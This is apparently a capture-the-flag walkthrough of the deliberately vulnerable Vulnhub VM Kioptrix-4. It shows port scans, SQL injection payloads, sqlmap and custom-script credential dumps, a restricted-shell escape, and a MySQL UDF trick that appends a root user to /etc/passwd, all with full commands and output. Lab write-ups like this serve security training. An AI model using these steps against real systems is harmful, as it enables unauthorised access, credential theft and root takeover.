Welcome to the Kioptrix-4 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Kioptrix-4

tags: Vulnhub Easy Linux OSCP
Platform: Vulnhub
Difficult: Easy
S.O.: Linux

Kioptrix: Level 1.3 (#4)

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -Pn -T4 -p- 172.20.10.9
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 14:24 CEST
Nmap scan report for 172.20.10.9
Host is up (0.0011s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 22.53 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80,139,445 172.20.10.9
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 14:25 CEST
Nmap scan report for 172.20.10.9
Host is up (0.00029s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 4h00m00s, deviation: 2h49m42s, median: 2h00m00s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2021-07-01T10:25:28-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 172.20.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.32 seconds

Port 80

On the website of port 80 we find an access form. Trying to do SQL injection with the classic payload 'OR' 1 '=' 1 we see that we can access it even though it reports an error.

Blind SQL Injection

As I am completing this box as training for the OSCP and Nmap is not allowed in the exam, I have written a script to be able to do the exploitation.

$ python3 blindSQLinjector.py -u http://172.20.10.9/checklogin.php -f 'myusername' -f 'mypassword' -p mypassword -H '{"Content-Type": "application/x-www-form-urlencoded","Cookie": "PHPSESSID=52757c941a411bfc3df3bf45c1c2e406"}' -e 'Wrong Username'
 __________________________________________________________________________
|  _     _ _           _  _____  ____  _      _____       _           _    |
| | |   | (_)         | |/ ____|/ __ \| |    |_   _|     (_)         | |   |
| | |__ | |_ _ __   __| | (___ | |  | | |      | |  _ __  _  ___  ___| |_  |
| |  _ \| | | ˇ_ \ / _  |\___ \| |  | | |      | | | ˇ_ \| |/ _ \/ __| __| |
| | |_) | | | | | | (_| |____) | |__| | |____ _| |_| | | | |  __/ (__| |_  |
| |_.__/|_|_|_| |_|\__,_|_____/ \___\_\______|_____|_| |_| |\___|\___|\__| |
|                                                       _/ |               |
|                           Made by X4v1l0k            |__/                |
|__________________________________________________________________________|

+---------------------------------------+
|   Database: members | Table: members  |
+----+----------+-----------------------+
| id | username |        password       |
+----+----------+-----------------------+
| 1  |   john   |      MyNameIsJohn     |
| 2  |  robert  | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

Anyway, so that everyone can see how to do it with SQLMap, here I put it!

SQLMap

$ sqlmap -u http://172.20.10.9/checklogin.php --data="myusername=admin&mypassword=admin5&Submit=Login" -D members -T members --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:33:24 /2021-07-01/

[21:33:25] [INFO] resuming back-end DBMS 'mysql' 
[21:33:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=HMFmOXVY&mypassword=-3789' OR 1396=1396#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=HMFmOXVY&mypassword=v2W!k6n!K5' AND (SELECT 7971 FROM (SELECT(SLEEP(5)))ywLP)-- BXgs&Submit=Login
---
[21:33:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[21:33:25] [INFO] fetching columns for table 'members' in database 'members'
[21:33:25] [INFO] resumed: 3
[21:33:25] [INFO] resumed: id
[21:33:25] [INFO] resumed: username
[21:33:25] [INFO] resumed: password
[21:33:25] [INFO] fetching entries for table 'members' in database 'members'
[21:33:25] [INFO] fetching number of entries for table 'members' in database 'members'
[21:33:25] [INFO] resumed: 2
[21:33:25] [INFO] resumed: 1
[21:33:25] [INFO] resumed: MyNameIsJohn
[21:33:25] [INFO] resumed: john
[21:33:25] [INFO] resumed: 2
[21:33:25] [INFO] resumed: ADGAdsafdfwt4gadfga==
[21:33:25] [INFO] resumed: robert
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

[21:33:25] [INFO] table 'members.members' dumped to CSV file '/root/.local/share/sqlmap/output/172.20.10.9/dump/members/members.csv'
[21:33:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.20.10.9'

[*] ending @ 21:33:25 /2021-07-01/

Exploitation

Now that we have the passwords of the users, we tested it with SSH and we managed to access but, we are in a restricted shell.

$ ssh john@172.20.10.9
john@172.20.10.9's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls
john:~$

Reading on the internet how to escape and trying various methods, we managed to escape using the echo command and executing python os.system('/bin/bash).

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$

Post exploitation

Privilege escalation: user to user

Enumeration

Linpeas

[+] MySQL connection using root/NOPASS ................. Yes
[+] Searching mysql credentials and exec
Found lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');

Exploitation

Linpeas tells us that we can access MySQL as root without a password and that the lib_mysqludf_sys.so library is loaded so we can execute system commands as root from MySQL using the sys_eval(); function.

john@Kioptrix4:~$ mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 77819
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| members            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> use mysql; 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> SELECT sys_eval('id');
ERROR 1305 (42000): FUNCTION mysql.sys_eval does not exist

As we can see, the function is not created but we can create it and thus be able to use it.

mysql> CREATE FUNCTION sys_eval RETURNS INT SONAME 'lib_mysqludf_sys.so';                                           
Query OK, 0 rows affected (0.00 sec)

mysql> SELECT sys_eval('id');                                            
+----------------+
| sys_eval('id') |
+----------------+
|           NULL | 
+----------------+
1 row in set (0.01 sec)

Cool! Now if we can use it, we are going to inject a user with root privileges in the /etc/passwd file.

mysql> select sys_eval('echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| sys_eval('echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
|                                                                        146120912 | 
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)

And now we should be able to authenticate with the injected user and we would be root!

john@Kioptrix4:~$ su x4v1l0k
Password: 
Failed to add entry for user x4v1l0k.

root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john#

And that have been all!

I have enjoyed making this box as I have never exploited a blind SQL injection manually before. And thanks to this box, now I have my own script to exploit them!! :D